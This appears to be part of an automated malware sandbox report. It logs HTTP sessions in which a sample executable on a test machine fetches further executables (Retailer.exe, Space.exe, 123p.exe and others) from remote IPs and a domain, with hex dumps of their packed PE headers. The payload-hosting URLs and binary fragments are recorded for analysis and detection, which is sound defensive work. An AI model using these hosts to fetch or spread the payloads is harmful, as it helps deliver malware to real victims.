Mar 28, 2024 09:14:58.380819082 CET	197	OUT	HEAD /retail.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.22 Cache-Control: no-cache
Mar 28, 2024 09:14:58.589720011 CET	354	IN	HTTP/1.1 200 OK Server: nginx/1.22.0 Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: application/octet-stream Content-Length: 5655872 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=Retailer.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public
Mar 28, 2024 09:14:58.589956045 CET	196	OUT	HEAD /space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.22 Cache-Control: no-cache
Mar 28, 2024 09:14:58.797394037 CET	351	IN	HTTP/1.1 200 OK Server: nginx/1.22.0 Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: application/octet-stream Content-Length: 5726528 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=Space.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public
Mar 28, 2024 09:14:58.797684908 CET	198	OUT	GET /getimage.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.22 Cache-Control: no-cache
Mar 28, 2024 09:14:59.005784988 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.22.0 Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: application/octet-stream Content-Length: 5713216 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=Arab.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ae 62 fd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 d4 10 00 00 80 03 00 00 00 00 00 28 64 8e 00 00 10 00 00 00 f0 10 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 99 00 00 04 00 00 ed 0d 58 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 24 19 8b 00 4a 00 00 00 8c 92 92 00 40 01 00 00 00 30 99 00 1b 11 00 00 00 00 00 00 00 00 00 00 00 b0 56 00 40 7d 00 00 00 10 99 00 54 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 ff 98 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 42 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 d2 10 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 3c 02 00 00 f0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 48 00 00 00 30 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb 44 fd 2e 00 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 b3 c2 bb 04 07 00 00 00 80 42 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb a0 74 56 00 00 90 42 00 00 76 56 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 54 1a 00 00 00 10 99 00 00 1c 00 00 00 82 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1b 11 00 00 00 30 99 00 00 12 00 00 00 9e 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELbe"(d@PX@$J@0V@}T@B.textX `.rdata<@@.dataH0@.vmpD. `.vmpB@.vmptVBvV `.relocTV@@.rsrc0V@@
Mar 28, 2024 09:14:59.005809069 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ~JPC@DYs*GGd.\6S0J!yHlKIt!B
Mar 28, 2024 09:14:59.019632101 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 28, 2024 09:14:59.019650936 CET	1286	IN	Data Raw: e8 dd a4 47 00 e9 18 7d 52 00 8a 8c 0d a0 8b 8e 80 81 d5 01 00 00 00 68 a0 93 9d a9 f7 5c 24 00 c1 44 24 00 c3 f6 d0 0f 8a a6 ea 07 00 68 ab 7f 15 a6 f7 f6 68 16 b2 89 10 89 54 25 00 68 96 7f 8f 33 68 25 09 87 bc 89 45 04 68 a5 5f 98 37 e8 bf c3 Data Ascii: G}Rh\$D$hhT%h3h%Eh_7K]U@0O@4w]o5robm4'-_(LK!me'%g,:mo%Ug#h}]h`3ITg';w*Zl02$`n,
Mar 28, 2024 09:14:59.033512115 CET	1286	IN	Data Raw: 3f c1 6d d6 d8 06 53 63 59 0b 5f a4 fb ee 1e 83 3a 60 b5 22 e9 e9 d1 44 b6 c3 a7 ef 62 c0 f5 a9 05 74 90 1e 83 3a 60 15 a2 1b 01 cc 9e ca 05 74 90 1e 83 3a 60 b0 47 12 e5 a6 78 15 5d 88 fa b7 9b bd c6 7a 8a 99 95 ba cf dc 7a 17 3c a0 2d 4b b5 bb Data Ascii: ?mScY_:`"Dbt:`t:`Gx]zz<-K}9~F@QL};3R24^Ym&~z{HG .:eK]l1%X_0zEB1MzM0)e)Yg~QzEH
Mar 28, 2024 09:14:59.033543110 CET	1286	IN	Data Raw: b1 12 b0 35 53 f6 18 f4 2a 25 a7 cb 3d 50 bf 57 18 a0 3f ff 05 70 bf 47 b8 48 67 af 90 40 5a df 60 f0 3a 47 7d 28 52 67 08 a0 2a 52 c0 ee 65 25 b8 9d 4c 64 79 6c 20 fb 81 70 3b 99 c8 2e e4 ea 24 ae 03 09 97 02 be 3f a9 37 48 ce 37 3d 3c c6 65 cb Data Ascii: 5S%=PW?pGHg@Z`:G}(RgRe%Ldyl p;.$?7H7=<ejP2\e!H! :=(gH(b_XUWm8RZ\pa/<F\|1<>'$Lm4::A}@rr[hwN\$\PdPh*q
Mar 28, 2024 09:14:59.047367096 CET	1286	IN	Data Raw: 7c ac 95 86 2d 47 19 17 21 7b d4 56 d7 3c 80 60 b5 5d 47 51 3b 38 b9 48 2e 95 86 2d 47 19 17 c1 0b 9d 99 90 97 cc a5 23 03 ac 95 86 2d 47 19 18 ee 73 6d 38 a5 6e 24 e6 1c d6 51 40 ab 53 86 2d 47 19 c1 f7 ad d7 a2 0d 95 8b 1d cd 05 ab 21 68 86 67 Data Ascii: \|-G!{V<`]GQ;8H.-G#-Gsm8n$Q@S-G!hg'v)4IS,/T+HmI~]w!(a;\zhLUQR87=ro&ejUo:P}P:m:(=2*M2}H>LNbJ-144m$210e
Mar 28, 2024 09:14:59.047395945 CET	1286	IN	Data Raw: 30 9e db 1f 08 91 1d bf 90 5b 4d 1a 8f 86 dd bc 6a 1b 38 d2 e7 58 2d 0a 26 48 de 00 ac dd b1 a4 91 1d bf 90 75 63 1c a1 fb 3c 73 83 25 36 f8 89 1d ea 18 7f 91 1d bf 90 90 46 2b d3 45 f3 7e 44 94 26 ae bc 5e 40 ce 06 0a fe 68 8c b8 3d 33 ba cc a5 Data Ascii: 0[Mj8X-&Huc<s%6F+E~D&^@h=3M{y1US?3~X+03Zz3%jjR!{)}z3A3<n.-M_3\L3`Z3)&SctOAkJQ}6?d
Mar 28, 2024 09:14:59.061095953 CET	1286	IN	Data Raw: 1b 74 9a 64 54 af 69 b4 76 4c f2 59 f6 3f 4d f2 83 a0 80 ee 42 3f 6a 12 b2 76 b1 78 08 75 6e a1 32 68 c1 5d b7 a8 71 2b 7c 0c 33 80 31 2e e3 06 1a 0e 2d 97 18 33 07 b5 2f 8f 33 69 f8 0e 4d 1f 02 e0 00 9e 22 64 ed 85 04 45 3d 6a 7b 75 10 39 63 cc Data Ascii: tdTivLY?MB?jvxun2h]q+\|31.-3/3iM"dE=j{u9cPLrj@..\cAA]N8)Ud$Bfl$ifKl$f\$fffD$Df.f3L$T$2$fD'fMd$pW>h!D$3fL$GIh
Mar 28, 2024 09:14:59.061148882 CET	1286	IN	Data Raw: d3 cb f4 24 cb 23 b9 5c 90 09 6b f4 34 ee 8b c4 7c 66 9c 02 08 b1 6e 8e 71 1b 57 09 fc 56 19 94 53 f4 a0 7f 58 bd 1f 8d b9 b0 08 9f ff b0 7a bf 7d d3 21 08 c0 c3 4d 2f 1a 60 cd bb 9a ac f3 d9 13 e0 12 89 5f f2 3e 5c e5 4b 24 96 23 21 8c 7a f2 ff Data Ascii: $#\k4\|fnqWVSXz}!M/`_>\K$#!z]#\bO](b_?<&ruO5-E\|Xm\_dRjHug,Fs]?LQ0k`mK.!=jkR+L2hZvvD$$fh^
Mar 28, 2024 09:14:59.075009108 CET	1286	IN	Data Raw: 85 81 d5 08 00 00 00 68 38 41 17 5a 36 89 08 e8 10 03 49 00 81 d5 04 00 00 00 e9 e4 ca 06 00 8d 64 24 08 e9 2e b3 4a 00 e9 85 0f 0c 00 68 1e 62 81 ec 80 54 24 03 2f 32 cb 66 c1 7c 24 02 6b 0f 83 88 50 0a 00 68 b7 d2 1f 9f b9 9d a2 91 64 0f ba f1 Data Ascii: h8AZ6Id$.JhbT$/2f\|$kPhd-c}nY-`p(QYL$L&L$)Nal`{GA5 N&=ALT&<_6+cqB/+AhfL
Mar 28, 2024 09:15:03.053683043 CET	195	OUT	GET /space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.22 Cache-Control: no-cache
Mar 28, 2024 09:15:03.260970116 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.22.0 Date: Thu, 28 Mar 2024 08:15:03 GMT Content-Type: application/octet-stream Content-Length: 5726528 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=Space.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ae 62 fd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 d4 10 00 00 80 03 00 00 00 00 00 e5 76 4c 00 00 10 00 00 00 f0 10 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 99 00 00 04 00 00 c5 fa 57 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 f7 4b 00 4a 00 00 00 bc 7a 5d 00 40 01 00 00 00 90 99 00 1b 11 00 00 00 00 00 00 00 00 00 00 00 e4 56 00 40 7d 00 00 00 70 99 00 94 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 64 99 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 42 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 d2 10 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 3c 02 00 00 f0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 48 00 00 00 30 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb cf 27 2f 00 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 b3 c2 bb 04 07 00 00 00 b0 42 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 b3 c2 bb 80 a9 56 00 00 c0 42 00 00 aa 56 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 94 1a 00 00 00 70 99 00 00 1c 00 00 00 b6 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1b 11 00 00 00 90 99 00 00 12 00 00 00 d2 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELbe"vL@W@KJz]@V@}pd@B.textX `.rdata<@@.dataH0@.vmp'/ `.vmpB@.vmpVBV `.relocpV@@.rsrcV@@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	195.20.16.46	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.381059885 CET	206	OUT	HEAD /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 195.20.16.46 Cache-Control: no-cache
Mar 28, 2024 09:14:58.585988045 CET	255	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:58 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Sun, 24 Mar 2024 15:56:04 GMT ETag: "ab2000-6146a18211f22" Accept-Ranges: bytes Content-Length: 11214848 Content-Type: application/x-msdos-program
Mar 28, 2024 09:14:58.586437941 CET	205	OUT	GET /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 195.20.16.46 Cache-Control: no-cache
Mar 28, 2024 09:14:58.792095900 CET	1286	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:58 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Sun, 24 Mar 2024 15:56:04 GMT ETag: "ab2000-6146a18211f22" Accept-Ranges: bytes Content-Length: 11214848 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 db 4c 00 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 2e ca 00 00 00 00 00 79 fc 01 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 a1 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 66 01 64 00 00 00 00 10 a1 01 58 2c 00 00 60 d8 a0 01 fc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 fb 00 28 00 00 00 20 d7 a0 01 38 01 00 00 00 00 00 00 00 00 00 00 00 10 f6 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e6 7e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f0 1d 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 e9 c9 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 a0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 e3 34 2b 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 38 08 00 00 00 10 f6 00 00 0a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 5c e3 aa 00 00 20 f6 00 00 e4 aa 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 58 2c 00 00 00 10 a1 01 00 2e 00 00 00 f2 aa 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 59 01 01 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdLf#.y@@ .fdX,`*v( 8h.text~ `.rdata@@.datah@.pdata@@.00cfg@@.tls@.text04+ `.text18@.text2\ `h.rsrcX,.@@RY
Mar 28, 2024 09:14:58.792103052 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 a0 61 68 01 00 00 00 00 00 00 00 00 00 00 00 00 d0 6f 03 01 00 00 00 00 00 00 00 00 00 00 00 00 ca 7f ff 00 00 00 00 00 94 f8 01 01 00 00 00 00 ac 87 03 01 00 00 00 00 80 dd 6c 01 00 00 00 00 ca c9 69 01 00 00 00 00 32 Data Ascii: aholi2g
Mar 28, 2024 09:14:58.792124987 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 28, 2024 09:14:58.792136908 CET	1286	IN	Data Raw: 76 ed 86 02 75 b0 66 f2 9e 13 79 fd df 5c f8 96 13 79 fd 5a e5 a0 85 4b 81 02 78 43 30 49 4f 0f 10 fe fd 1c 58 d7 8f 67 5e c8 ab 7e 78 46 81 c3 4c 17 d8 14 11 82 7b c7 d6 4e f8 7e 34 51 f8 7c fc 77 e5 79 51 fc 94 fd 6f dd 78 51 fc 84 fc c7 ad 79 Data Ascii: vufy\yZKxC0IOXg^~xFL{N~4Q\|wyQoxQyQWYJMNRG+D.](e%Fnv`6z<hUyT jul=githJciaX5X+HeiG5!0:2WI5xo
Mar 28, 2024 09:14:58.792144060 CET	1286	IN	Data Raw: e8 7b 9f cf cf 30 aa e8 c7 73 03 ef 30 aa e8 b3 2b bb 27 38 b4 e8 a3 00 08 0e 51 6e 4e 77 7d fd 8f 03 0c 6e e8 86 02 a2 c0 63 4d 86 16 79 fd 4b 9b 2c 9e 16 79 fd 9c c0 19 a6 16 79 fd a6 fd ae 5d 4e 81 02 60 f6 2d f9 4a 0f 10 b9 ee d0 ff f6 47 7b Data Ascii: {0s0+'8QnNw}ncMyK,yy]N`-JG{}?Tb\|=3?~l~qPC?7rEo`CVbv/DG?QQD%GBtCPW<?7:sGEEF?VcgvW
Mar 28, 2024 09:14:58.792155027 CET	1286	IN	Data Raw: 27 73 ad 85 17 16 42 eb 2f 9c da 18 c5 3f 65 25 f6 0f 8e ef 16 07 73 f5 39 3a da a3 34 2f 4e 35 53 b1 ea 74 f1 13 27 f3 20 b6 9c 87 07 2c a1 76 35 c1 ce b5 38 8c 7d 35 f0 13 27 b3 8a 4f 32 7f 73 9a 58 47 81 67 fe 0a 12 8b f1 13 27 73 f2 93 90 87 Data Ascii: 'sB/?e%s9:4/N5St' ,v58}5'O2sXGg's\|'3JeoJn7jfk7v)'OQ_65'sXm(Df'3]kjX+4u3jlcgJ[:_fK; :9t{\|FC?3c
Mar 28, 2024 09:14:58.792166948 CET	1286	IN	Data Raw: 51 cc ed 98 f5 c4 9b f4 33 c3 fa 27 aa f2 ec 86 4c 30 8c 80 8d 2c 5f 7d fb 27 aa 32 4d 5f c5 2f 52 bf c7 4c 17 1d ba a0 6e 44 b9 bc 53 0c 44 d2 fa 27 aa 72 51 85 4b 18 a9 66 cb 94 2b 2f 6c fb 27 aa f2 92 83 76 a4 a5 f0 be 85 b3 b6 be ad 6f 98 7f Data Ascii: Q3'L0,_}'2M_/RLnDSD'rQKf+/l'voO'2f>'rSMBL@kmF%'IRpKOt!}}V7-$=$&})PH_(#$'2z}k46eA.FMA'r>_-'1
Mar 28, 2024 09:14:58.792232990 CET	1286	IN	Data Raw: ba ab c3 df e1 b4 22 1e b4 42 f3 d2 47 e8 d5 47 0f 9f d9 15 c2 df e9 b4 eb 6f 98 82 02 03 fb e9 e9 36 f6 ea c3 df 51 b4 1f 9b cd db 9c 72 01 84 d8 05 a3 ff 84 d8 ee 94 9e 3b 89 92 62 8c 9e 5b 27 67 62 d9 cf 26 4b 08 64 39 1f 25 fe 13 93 54 c2 df Data Ascii: "BGGo6Qr;b['gb&Kd9%TAp0HY[)YjwI\R>`yT1:Y_(9q9}y!rqq)?<rCIW2uFukK5u05cBq-g,
Mar 28, 2024 09:14:58.792244911 CET	1286	IN	Data Raw: b6 8c e1 9e 3c 31 5c c8 48 79 5b 48 73 87 57 97 1d f9 92 b7 8e e7 92 71 a9 5e 12 4c 73 57 db 41 90 ab 38 ee 0d 0c b6 33 01 da c2 1f e5 cd fd 01 4d 0a b6 da 5c 05 33 83 db 56 18 ad ff bd 9a 96 47 7e a4 cc fd 01 4d 25 3c fe 57 1a 39 2b 14 e5 8b bc Data Ascii: <1\Hy[HsWq^LsWA83M\3VG~M%<W9+8{[W\WA^,B-%DZr]S1VL9\|Q]og{te2O+kbSaH>p4oh6M
Mar 28, 2024 09:14:58.792257071 CET	1286	IN	Data Raw: 2c f8 07 a1 15 c0 6a 06 1f 7b 9e 80 74 51 ba 3e 56 8c dd 38 68 34 b3 aa 04 9a ef bf 02 1e de c9 dd 94 9f ee 2a c1 2c fd b5 e7 d6 00 ca e5 c8 05 de 74 c3 92 25 bb 42 2f 66 86 17 04 b7 8f 77 9f 6f 60 59 ed c5 ac ca ea 22 4e c7 eb 08 8f b7 ba f9 d6 Data Ascii: ,j{tQ>V8h4,t%B/fwo`Y"NXfJRQW8Rd+$;ib58(-sq'8h.O!R'&~I=r3~r('5Z92"j[fN_=Y d_8a/gla+0&ET
Mar 28, 2024 09:14:58.997267962 CET	1286	IN	Data Raw: 1b 67 7a 0f b5 c3 28 f5 ca 6c 36 15 4c d9 07 bf 1c e6 97 f1 d0 d1 9f 7a 7d 6b 19 fd e9 86 b0 51 d8 e1 e4 d3 a1 73 01 25 ec 4c d3 d0 47 21 ab b6 f0 10 14 84 4b c0 e6 e7 d6 9e 26 6b b6 ad e8 7e 2c 44 f7 86 c9 0a a3 ba e5 3f 44 80 df 13 ed 03 18 8b Data Ascii: gz(l6Lz}kQs%LG!K&k~,D?D-Q1YWA Q$&8N"!DY7= 0.qeTqQy!v!R:@U9 pSk}ASwI!I&b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	104.21.22.54	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.381130934 CET	210	OUT	HEAD /data/pdf/june.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: act.fishoaks.net Cache-Control: no-cache
